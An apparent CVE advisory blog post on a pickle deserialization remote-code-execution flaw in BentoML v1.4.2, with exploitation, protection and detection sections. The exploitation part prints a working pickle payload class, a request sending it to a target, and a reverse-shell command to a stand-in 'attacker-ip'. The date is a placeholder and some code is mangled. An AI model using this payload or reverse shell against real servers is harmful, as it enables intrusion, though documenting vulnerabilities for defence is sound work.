Listen to this Post
How the CVE Works
The vulnerability exists in BentoML v1.4.2 due to unsafe deserialization in serde.py. The `deserialize_value` function uses Python’s `pickle.loads()` without validation, allowing attackers to craft malicious payloads. When a user sends a manipulated HTTP request containing serialized data, the server deserializes it, executing arbitrary commands. Since the payload is untrusted and directly processed, Remote Code Execution (RCE) is achieved. The exploit leverages Python’s `__reduce__` method in a malicious class, which executes system commands upon deserialization.
DailyCVE Form
Platform: BentoML
Version: v1.4.2
Vulnerability: RCE via deserialization
Severity: Critical
Date: 2023-XX-XX
What Undercode Say:
Exploitation
1. Crafting Payload:
import pickle
import os
class Exploit:
def <strong>reduce</strong>(self):
return (os.system, ('malicious-command',))
payload = pickle.dumps(Exploit())
2. Sending Payload:
import requests
requests.post("http://target:3000/endpoint", data=payload, headers={'Content-Type': 'application/vnd.bentoml+pickle'})
3. Reverse Shell:
nc -lvnp 4444
Modify `__reduce__` to execute nc attacker-ip 4444 -e /bin/sh.
Protection
1. Patch:
Replace `pickle.loads()` with a safe deserializer like `json.loads()`.
2. Input Validation:
def safe_deserialize(payload):
if not validate_payload(payload):
raise ValueError("Invalid payload")
3. Network Controls:
iptables -A INPUT -p tcp --dport 3000 -s trusted-ip -j ACCEPT
4. Monitoring:
grep -r "pickle.loads" /path/to/bentoml
5. Workaround:
Disable affected endpoints until patched.
Detection
1. Log Analysis:
tail -f /var/log/bentoml.log | grep "deserialize_value"
2. YARA Rule:
rule bentoml_rce {
strings:
$pickle = "pickle.loads"
condition:
$pickle
}
Mitigation
- Upgrade to a fixed version.
- Restrict network access to BentoML services.
- Use Web Application Firewalls (WAF) to block suspicious pickle payloads.
References
References:
Reported By: https://github.com/advisories/GHSA-33xw-247w-6hmc
Extra Source Hub:
Undercode
